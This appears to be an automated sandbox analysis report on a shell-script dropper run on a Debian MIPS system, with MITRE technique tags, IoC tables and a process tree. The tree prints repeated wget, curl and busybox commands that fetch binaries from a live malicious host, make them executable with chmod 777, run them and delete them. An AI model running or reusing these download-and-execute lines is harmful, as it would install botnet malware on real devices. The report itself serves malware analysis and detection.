86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0

Analysis

max time kernel
85s
max time network
88s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
15/10/2024, 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Size

10KB
MD5

5b7965317583f6ec3ecb200b64ab84dc
SHA1

242199969bb87b8f91c50399dbc9a2fcfa918cb9
SHA256

86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
SHA512

53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
SSDEEP

96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
751	chmod
912	chmod
968	chmod
976	chmod
817	chmod
880	chmod
888	chmod
920	chmod
928	chmod
936	chmod
768	chmod
896	chmod
1019	chmod
861	chmod
904	chmod
960	chmod
834	chmod
869	chmod
952	chmod
998	chmod
797	chmod
984	chmod
1005	chmod
1012	chmod
1026	chmod
744	chmod
944	chmod
991	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
924	wget
972	wget
748	curl
895	busybox
900	wget
901	curl
916	wget
911	busybox
925	curl
994	wget
995	curl
1023	curl
873	wget
876	busybox
997	busybox
1004	busybox
1008	wget
967	busybox
814	curl
816	busybox
908	wget
919	busybox
956	wget
840	wget
893	curl
964	wget
988	curl
1022	wget
717	wget
743	busybox
866	curl
1016	curl
775	wget
803	wget
917	curl
959	busybox
1001	wget
750	busybox
821	curl
885	curl
932	wget
965	curl
731	curl
884	wget
933	curl
951	busybox
1015	wget
892	wget
909	curl
948	wget
987	wget
980	wget
765	busybox
792	busybox
820	wget
903	busybox
975	busybox
1025	busybox
847	curl
865	wget
935	busybox
957	curl
1009	curl
755	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	curl
File opened for modification	/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	curl
File opened for modification	/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	curl
File opened for modification	/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	curl
File opened for modification	/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	curl
File opened for modification	/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	curl
File opened for modification	/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	curl
File opened for modification	/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	curl
File opened for modification	/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	curl
File opened for modification	/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	curl
File opened for modification	/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	curl
File opened for modification	/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	curl
File opened for modification	/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	curl
File opened for modification	/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	curl
File opened for modification	/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	curl
File opened for modification	/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	curl
File opened for modification	/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	curl
File opened for modification	/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	curl
File opened for modification	/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	curl
File opened for modification	/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	curl
File opened for modification	/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	curl
File opened for modification	/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	curl
File opened for modification	/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	curl
File opened for modification	/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	curl
File opened for modification	/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	curl
File opened for modification	/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	curl
File opened for modification	/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	curl
File opened for modification	/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	curl

/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
1⤵
PID:711
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:714
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:717
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:731
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:743
- /bin/chmod
  chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:746
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - System Network Configuration Discovery
  PID:750
- /bin/chmod
  chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:753
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:765
- /bin/chmod
  chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Executes dropped EXE
  PID:769
- /bin/rm
  rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  PID:773
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:775
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:782
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:792
- /bin/chmod
  chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  PID:801
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:803
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:814
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:816
- /bin/chmod
  chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:819
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - System Network Configuration Discovery
  PID:820
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:830
- /bin/chmod
  chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Executes dropped EXE
  PID:835
- /bin/rm
  rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:839
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - System Network Configuration Discovery
  PID:840
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:847
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:856
- /bin/chmod
  chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Executes dropped EXE
  PID:862
- /bin/rm
  rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:864
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:865
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:866
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:868
- /bin/chmod
  chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Executes dropped EXE
  PID:870
- /bin/rm
  rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:872
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:873
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:876
- /bin/chmod
  chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:887
- /bin/chmod
  chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:891
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:892
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:895
- /bin/chmod
  chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Executes dropped EXE
  PID:897
- /bin/rm
  rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  PID:899
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:900
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:903
- /bin/chmod
  chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:911
- /bin/chmod
  chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  PID:915
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:916
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:919
- /bin/chmod
  chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:923
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - System Network Configuration Discovery
  PID:924
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:925
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:927
- /bin/chmod
  chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  - Executes dropped EXE
  PID:929
- /bin/rm
  rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  2⤵
  PID:931
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:932
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:933
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - System Network Configuration Discovery
  PID:935
- /bin/chmod
  chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:943
- /bin/chmod
  chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  2⤵
  PID:947
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:948
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:949
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - System Network Configuration Discovery
  PID:951
- /bin/chmod
  chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  2⤵
  PID:955
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:956
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:957
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - System Network Configuration Discovery
  PID:959
- /bin/chmod
  chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - System Network Configuration Discovery
  PID:967
- /bin/chmod
  chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  2⤵
  PID:971
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:972
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:973
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - System Network Configuration Discovery
  PID:975
- /bin/chmod
  chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
  rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  2⤵
  PID:979
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - System Network Configuration Discovery
  PID:980
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:981
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:983
- /bin/chmod
  chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - File and Directory Permissions Modification
  PID:984
